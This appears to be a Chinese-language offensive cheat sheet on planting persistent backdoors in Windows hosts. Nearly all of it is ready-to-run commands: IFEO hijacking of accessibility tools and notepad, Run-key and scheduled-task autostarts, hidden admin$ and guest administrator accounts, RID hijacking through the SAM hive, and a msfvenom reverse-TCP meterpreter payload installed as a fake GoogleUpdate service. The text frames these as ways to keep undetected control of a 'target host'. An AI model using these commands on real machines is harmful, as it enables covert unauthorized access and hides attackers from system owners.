目录
系统工具替换后门(IFEO镜像劫持)
打开注册表regedit
路径位置
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
劫持浏览器
找个是把系统浏览器替换成打开cmd,我们可以替换成免杀的后门病毒,上线目标主机
替换系统工具的注销界面的工具为cmd.exe,我们可以替换成免杀的后门病毒,上线目标主机
常用辅助功能
1.Shift(sethc)
2.屏幕键盘(osk)
3.辅助工具管理器(Utilman)
4.讲述人(Narrator)
劫持 Narrator 讲述人
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
成功
Utilman劫持辅助工具管理器
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
劫持成功
Notepad
实现原程序退出后静默运行后门程序。以执行 notepad 为例,退出后静默运行 calc.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d "C:\Windows\system32\calc.exe" /f
# 可以更改C:\Windows\system32\calc.exe为payload,如powershell命令
打法
如果rdp没有开启网络身份验证的话,我们可以输入错误密码进入rdp的登录密码界面,然后再结合上面的漏洞打
Metasploit
Metasploit 框架提供了一个后渗透模块,可实现自动化地利用沾滞键的权限维持技术,该模块将用 CMD 替换辅助功能的二进制文件(sethc,osk,disp,utilman)
use post/windows/manage/sticky_keys
开机自启动项注册表
cmd下启动
upload GoogleUpdate.exe C:\\windows\\temp\\GoogleUpdate.exe
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v GoogleUpdate -d 'C:\windows\temp\GoogleUpdate.exe'
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v GoogleUpdate
reboot
metasploit启动
upload GoogleUpdate.exe C:\\windows\\temp\\GoogleUpdate.exe(注意!这条命令是在meterpreter里执行)
shell(注意!这条命令是在meterpreter里执行)
reg query HKLM\software\microsoft\windows\currentversion\run
reg add HKLM\software\microsoft\windows\currentversion\run /v GoogleUpdate /t REG_SZ /d "C:\windows\temp\GoogleUpdate.exe"
reg query HKLM\software\microsoft\windows\currentversion\run /v GoogleUpdate
shutdown -r -f -t 0
Schtasks计划任务
创建test任务,每一分钟执行一次
schtasks /create /sc MINUTE /mo 1 /tr C:\Users\Administrator\Desktop\6666.exe /tn test
常用命令
# 每分钟执行一次任务
schtasks /create /sc MINUTE /mo 1 /tn calc_update /tr "C:\windows\temp\5555.exe"
# 每小时执行一次任务
schtasks /create /sc HOURLY /mo 1 /tn calc_update /tr "C:\windows\temp\5555.exe"
# 每天执行一次任务
schtasks /create /sc DAILY /mo 1 /tn calc_update /tr "C:\windows\temp\5555.exe"
# 每周执行一次任务
schtasks /create /sc WEEKLY /mo 1 /tn calc_update /tr "C:\windows\temp\5555.exe"
# 删除计划任务
schtasks /delete /tn calc_update /F
账户隐藏
隐藏账户
通过 net user 命令查看不到,但是在控制面板的管理账户界面可以查看到。
net user admin$ AdminPassw0ad /add && net localgroup administrators admin$ /add
激活guest账户
net user guest Admin@hacker && net localgroup administrators guest /add
net user guest /active:yes
RID劫持
16进制的替换
HKEY LOCAL MACHINE\SAM\SAM\Domains\Account\Users
1.用'$'创建匿名用户,并归到 administrators 用户组
net user admin$ admin@123 /add /y
net localgroup administrators admin$ /add
net localgroup "remote desktop users" admin$ /add
2.将 administrator 用户对应的 Users 中的F值复制替换后门账户的F 值
或者直接修改 admin$ 用户的F值,把其中的 F2 03 修改为 F4 01 即可
3.导出 Users 下面的后门账户以及 Names下面的后门账户两个注册表文件
4.通过命令删除刚才的后门用户
net user admin$ /del
5.通过注册表导入刚才导出的两个注册表文件
regedit /s 1.reg
regedit /s 2.reg
用先前导出的注册表键值对注册表进行修改。则可以重新还原之前的匿名用户,但是除了在注册表里面有用户记录,其他地方都不存在用户的信息。
(MSF)服务后门
服务后门木马
1、msfvenom生成payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.58.144 lport=8989 -f exe-service -o GoogleUpdate.exe
2、sc创建一个GoogleUpdateservice服务,执行我们上传的木马
sc create GoogleUpdateService binPath= "C:\Windows\temp\GoogleUpdate.exe" displayname= "GoogleUpdateService" start= auto